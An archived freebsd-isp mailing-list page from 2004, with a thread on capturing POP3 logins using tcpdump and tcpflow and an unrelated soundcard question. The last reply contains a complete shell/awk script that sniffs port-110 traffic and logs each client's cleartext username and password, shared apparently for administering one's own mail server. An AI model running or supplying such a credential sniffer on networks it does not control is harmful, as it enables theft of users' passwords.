Subject: Re: tcpdump for sniffing POP3 -- methods ? - msg#00082

Previous Message by Date: click to view message preview

Re: tcpdump for sniffing POP3 -- methods ?

On Tue, Apr 13, 2004, Adam Maloney wrote: >I've done this in the past. I had tcpdump spitting out all the dst port >110 packets to a file. Then a perl script with Net::TCPDump (or >whatever it's called) to parse it. The tcpflow program makes this far easier as it separates each connection out into its own file. The command line options for tcpflow are about the same as tcpdump. Bill -- INTERNET: bill@xxxxxxxxxxxxx Bill Campbell; Celestial Software LLC UUCP: camco!bill PO Box 820; 6641 E. Mercer Way FAX: (206) 232-9186 Mercer Island, WA 98040-0820; (206) 236-1676 URL: http://www.celestial.com/ It's very glamorous to raise millions of dollars, until it's time for the venture capitalist to suck your eyeballs out. -- Peter Kennedy, chairman of Kraft & Kennedy. _______________________________________________ freebsd-isp@xxxxxxxxxxx mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-isp To unsubscribe, send any mail to "freebsd-isp-unsubscribe@xxxxxxxxxxx"

Next Message by Date: click to view message preview

soundcard

hi, I'am a real newbie, from Guatemala, and i got my first question, how can i know if mi soundcard is properly configured, since I tray to play a song using xmms and a message appears like this ""Please check that: your soundcard is configured properly, you have the correct output plugin selected, no other application is blocking the sound card"", please help me and excuse my not very good english, thank to everybody. Adios. intelNet WebMail _______________________________________________ freebsd-isp@xxxxxxxxxxx mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-isp To unsubscribe, send any mail to "freebsd-isp-unsubscribe@xxxxxxxxxxx"

Previous Message by Thread: click to view message preview

Re: tcpdump for sniffing POP3 -- methods ?

On Tue, Apr 13, 2004, Adam Maloney wrote: >I've done this in the past. I had tcpdump spitting out all the dst port >110 packets to a file. Then a perl script with Net::TCPDump (or >whatever it's called) to parse it. The tcpflow program makes this far easier as it separates each connection out into its own file. The command line options for tcpflow are about the same as tcpdump. Bill -- INTERNET: bill@xxxxxxxxxxxxx Bill Campbell; Celestial Software LLC UUCP: camco!bill PO Box 820; 6641 E. Mercer Way FAX: (206) 232-9186 Mercer Island, WA 98040-0820; (206) 236-1676 URL: http://www.celestial.com/ It's very glamorous to raise millions of dollars, until it's time for the venture capitalist to suck your eyeballs out. -- Peter Kennedy, chairman of Kraft & Kennedy. _______________________________________________ freebsd-isp@xxxxxxxxxxx mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-isp To unsubscribe, send any mail to "freebsd-isp-unsubscribe@xxxxxxxxxxx"

Next Message by Thread: click to view message preview

Re: tcpdump for sniffing POP3 -- methods ?

On Tue, 13 Apr 2004, John Fox wrote: > 2) Obtain them by sniffing the POP3 traffic being sent > to the Imail server. > > I think #2 is the only possibility, and I haven't made much > use of tcpdump, so while I do know how to run it and > specify a host to listen to, I've no idea how to isolate > the clear-text stuff (containing the usernames and passwords) > from all the other traffic. > > Any suggestions would be greatly appreciated. I had to do this some years back, here's the rude, crude and unattractive script I wrote then: # cat sniff.pop.passwords #! /bin/sh log=sniffed.passwords.log mailhost="mail" # Hostname of whichever host receives your incomming mail tcpdump -lnx -s 256 dst port 110 and host $mailhost 2>/dev/null | awk ' BEGIN{ lut="123456789abcdef" } />/ { IP=$2; n=0; len=0; c=""; } { if(n==1) for(x=1; x<=4; x++) len=len*16+index(lut,substr($2,x,1)); if(++n>3 && len>20) { for(i=(n==4)*4+1; i<=NF; i++) c=sprintf("%s%c%c",c, index(lut,substr($i,1,1))*16+index(lut,substr($i,2,1)), index(lut,substr($i,3,1))*16+index(lut,substr($i,4,1))) if(length(c) >= len-40) { sub("\.[0-9]*$","",IP); v=substr(c,6); gsub("[^a-zA-Z0-9]","",v) if(substr(c,1,5)=="USER ") usr[IP]=v; if(substr(c,1,5)=="PASS " && usr[IP]) { printf("%s %-16.16s %10s - %s\n", strftime("%d-%b-%Y %H:%M:%S"), IP, usr[IP], v); usr[IP]="" } } } }' _______________________________________________ freebsd-isp@xxxxxxxxxxx mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-isp To unsubscribe, send any mail to "freebsd-isp-unsubscribe@xxxxxxxxxxx"